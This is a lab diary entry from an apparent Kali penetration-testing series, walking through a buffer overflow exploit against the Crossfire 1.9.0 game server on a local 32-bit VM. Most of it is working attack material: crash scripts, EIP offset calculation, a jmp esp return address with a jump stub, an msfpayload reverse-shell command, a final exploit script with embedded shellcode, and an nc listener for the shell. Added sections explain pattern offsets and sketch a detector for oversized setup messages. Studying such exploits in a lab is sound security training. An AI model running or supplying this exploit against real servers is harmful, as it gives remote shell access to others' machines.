Linux buffer overflow: Crossfire 1.9.0
Principle: Crossfire 1.9.0 has a buffer overflow vulnerability in the code that handles an accepted inbound socket connection.
Tools:
Debugger: EDB
### Python has a big advantage in penetration testing and exploitation work around overflow vulnerabilities
Experimental target: Crossfire (a multiplayer online RPG game)
Operating platform: Kali i686 virtual machine (32-bit; the "bits" of a CPU refer to the width of its address bus, and a 64-bit system has a 2^64 address space, which is too large to handle conveniently, so a 32-bit system is chosen to keep the exercises in this chapter simple)
Building the lab environment
# On Linux the game has to be installed together with its game folder
Server-side program
root@kali:~# cd Desktop
root@kali:~/Desktop# ls
crossfire.tar.gz
root@kali:~/Desktop# mv crossfire.tar.gz /usr/games
root@kali:~/Desktop# cd /usr/games/
root@kali:/usr/games# ls
crossfire.tar.gz
root@kali:/usr/games# tar zxpf crossfire.tar.gz
root@kali:/usr/games# ls -lh
total 4.8M
drwxr-xr-x 8 root root 4.0K Feb       crossfire
-rwxrwx--- 1 root root 4.8M     05:16 crossfire.tar.gz
root@kali:/usr/games# cd crossfire/
root@kali:/usr/games/crossfire# cd bin/
root@kali:/usr/games/crossfire/bin# ls
crossedit  crossfire  crossfire-config  crossloop  crossloop.pl  player_dl.pl
# If some component turns out to be missing, install the corresponding package; as long as you see "waiting for connect", it is basically fine
Check that the port is listening (13327)
root@kali:~# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:13327           0.0.0.0:*               LISTEN      4147/./crossfire
udp        0      0 0.0.0.0:68              0.0.0.0:*                           629/dhclient
Debugging tools
### EDB can also be launched from the command line
Newer Linux kernels support memory protection mechanisms:
DEP, ASLR, stack cookies, stack-smashing protection
Debug on the local machine only (this prevents unauthorized network access during the penetration test, so nobody else can get into the machine through the vulnerable service)
iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP   # only connections from this host to the local interface may reach 13327
iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP    # only connections from this host to the local interface may reach 4444
root@kali:~# iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP
root@kali:~# iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP
root@kali:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             !localhost            tcp dpt:13327
DROP       tcp  --  anywhere             !localhost            tcp dpt:4444

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
Debugging tools
Start the service under the EDB debugger:
edb --run /usr/games/crossfire/bin/crossfire
# Debug -> Run has to be clicked twice
To look at a register such as EIP, double-click it
01.py
#!/usr/bin/python
import socket

host = "127.0.0.1"
# ### Crossfire only overflows when the data sent has one fixed size: only 4379 characters land exactly on the overflow position ###
crash = "\x41" * 4379
buffer = "\x11(setup sound" + crash + "\x90\x90#)"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] sending evil buffer ..."
s.connect((host, 13327))    # the server listens on 13327 (see the netstat output above)
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] payload sent!"
If a buffer overflow occurs under EDB, the next instruction cannot be executed and an alert pop-up appears,
which confirms the buffer overflow vulnerability
# By changing the number of "A" characters sent, verify that the EIP register can only be modified when the count is 4379
Locate the EIP position precisely with a unique (cyclic) string:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb 4379
Put the unique string into 02.py
Double-click EIP
Use ./pattern_offset.rb to calculate the offset
So the four characters after offset 4368 are what overwrites EIP
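What pattern_create.rb and pattern_offset.rb compute, as an added Python 3 illustration (this is neither the Metasploit code nor part of the original post): the pattern is built from the same Upper/lower/digit triplets, and the offset is recovered from the EIP value the debugger shows, packed little-endian. The EIP value 0x46367046 below is derived from the pattern itself, not taken from the post; the 7 bytes left over at ESP match the layout the post describes.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern "Aa0Aa1Aa2...": triplets Upper+lower+digit,
    so every 3-byte (and 4-byte) window is unique within 20280 bytes."""
    chunks = []
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                chunks.append(up + lo + dg)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length):
    """Offset of the bytes that landed in EIP after sending pattern_create(length).

    eip_value is the register as the debugger prints it (an int such as
    0x46367046); x86 is little-endian, so it is packed with '<I' before the
    search. A 4-character str of the raw bytes is accepted too. Returns -1 when
    the value is not part of the pattern (EIP was not overwritten by our data)."""
    if isinstance(eip_value, int):
        needle = struct.pack("<I", eip_value).decode("latin-1")
    else:
        needle = eip_value
    return pattern_create(length).find(needle)


def overflow_layout(total_len, eip_offset):
    """How a fixed-size buffer splits up: filler, 4 bytes for EIP, the rest sits at ESP."""
    return {"filler": eip_offset, "eip": 4, "esp_room": total_len - eip_offset - 4}


if __name__ == "__main__":
    pat = pattern_create(4379)
    # What EDB would show in EIP after sending the 4379-byte pattern: 0x46367046
    eip = struct.unpack("<I", pat[4368:4372].encode("latin-1"))[0]
    print("EIP would read 0x%08x" % eip)
    off = pattern_offset(eip, 4379)
    print("pattern_offset ->", off)            # 4368
    print(overflow_layout(4379, off))          # 7 bytes of room at ESP
```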
Verify the location with 03.py
Look at the ESP data in the dump (Follow in Dump)
### Because only 7 more characters fit after the EIP overwrite while still hitting EIP precisely, the shellcode cannot be placed where ESP points, so look at the other registers
Find that EAX is usable
(Because "setup sound" is a server command, the first 12 characters of what is sent must be the setup sound command)
One idea is to add 12 to the address in EAX directly and jump there, but after moving to another machine the exploit may not work, because the value of EAX may differ between systems
Idea: (consider generality)
First-stage shellcode: at ESP (7 bytes available) jump to EAX, applying the 12-character offset in the stub placed at ESP
### a 5-byte stub, small enough to fit at ESP, that jumps to eax
\x83\xc0\x0c\xff\xe0\x90\x90   # add eax, 0xc ; jmp eax ; the \x90 bytes are NOP filler to guard against filtering (the computer reads the data in the order opposite to the order a human reads it)
04.py
Look at ESP
# Because the memory address in ESP is not fixed either, we need to find a fixed jump instruction in a module of the system
Addressing
Use the opcode search plugin in EDB
Use the first memory region, 08048000 (the main executable): as long as the program is running this region always exists, and it can be used to find a jmp esp
### EIP -> jmp esp -> esp -> eax
Find bad characters
### \x00\x0a\x0d\x20
Put all 256 byte values into the script and check each of them
Set a breakpoint (0x08134597)
eip -- 08134597
Then the EIP jump address is
crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"   # "\x97\x45\x13\x08" overwrites EIP (jmp esp at 0x08134597, little-endian); "\x83\xc0\x0c\xff\xe0\x90\x90" lands at ESP and jumps to EAX
04+.py
Set a breakpoint
Run (F9)
Press F8 to step to the next instruction
Press F8 again and execution jumps into the code at ESP
Replace part of the 4,368 "A" characters with the shellcode and keep filling the remaining positions with "A" (the number of shellcode characters has to be calculated)
Generate the shellcode
root@kali:/usr/share/framework2# ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"
Note: if the generated shellcode turns out to be wrong, rebooting can resolve it
#!/usr/bin/python
import socket

host = "127.0.0.1"
# reverse shell produced by msfpayload/msfencode above, 105 bytes
shellcode = ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"
             "\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"
             "\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"
             "\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"
             "\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"
             "\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"
             "\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"
             "\x1a\x99\x43\x71\x97\x54\x03")
# shellcode first, "A" padding up to offset 4368, then the EIP overwrite (jmp esp) and the 7-byte stub that runs at ESP
crash = shellcode + "A" * (4368 - 105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
buffer = "\x11(setup sound" + crash + "\x90\x90#)"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] sending evil buffer ..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] payload sent!"
# Open a listener on port 4444 (you get a shell when the target connects back to 4444)
nc -l -p 4444   ### get the shell
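From the defender's side, as an added Python 3 example that is not part of the post: a check over the message shape the scripts above use (the `\x11(setup sound` prefix) that flags a setup argument far longer than any legitimate client would send, or one containing non-printable bytes. The 256-byte limit and the three sample messages are constructed here; the probe and staged samples only reuse the byte layout already shown in the post.

```python
import string

PREFIX = b"\x11(setup sound"          # framing used by 01.py and the final script above
PRINTABLE = set(string.printable.encode("ascii")) - {0x0b, 0x0c}
MAX_SETUP_ARG = 256                   # assumed sane upper bound, constructed for this example


def inspect_setup_message(msg, max_arg=MAX_SETUP_ARG):
    """Verdict for one raw client message (bytes).

    A legitimate 'setup sound' argument is a short printable token; the crash
    probe (4379 x 'A') and the staged payload (filler + EIP overwrite + stub)
    are thousands of bytes and carry non-printable bytes, so either condition
    flags the message."""
    if not msg.startswith(PREFIX):
        return {"matched": False, "flagged": False, "reason": "not a setup sound message"}
    arg = msg[len(PREFIX):].strip()
    nonprintable = sum(1 for b in arg if b not in PRINTABLE)
    reasons = []
    if len(arg) > max_arg:
        reasons.append("argument length %d exceeds %d" % (len(arg), max_arg))
    if nonprintable:
        reasons.append("%d non-printable bytes in argument" % nonprintable)
    return {"matched": True, "flagged": bool(reasons), "arg_len": len(arg),
            "nonprintable": nonprintable, "reason": "; ".join(reasons) or "ok"}


def scan(messages):
    """Indexes of the messages that should raise an alert."""
    return [i for i, m in enumerate(messages) if inspect_setup_message(m)["flagged"]]


# Constructed samples: a normal client request and the two shapes used in this post.
BENIGN = PREFIX + b" 1"
PROBE = PREFIX + b"A" * 4379 + b"\x90\x90#)"
STAGED = PREFIX + b"A" * 4368 + b"\x97\x45\x13\x08" + b"\x83\xc0\x0c\xff\xe0\x90\x90" + b"\x90\x90#)"

if __name__ == "__main__":
    for name, m in (("benign", BENIGN), ("probe", PROBE), ("staged", STAGED)):
        print(name, inspect_setup_message(m))
    print("alert on message indexes:", scan([BENIGN, PROBE, STAGED]))   # [1, 2]
```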
Little White Diary, to be continued ...
Little White Diary 18: Kali penetration testing, buffer overflow example (II): Linux, Crossfire 1.9.0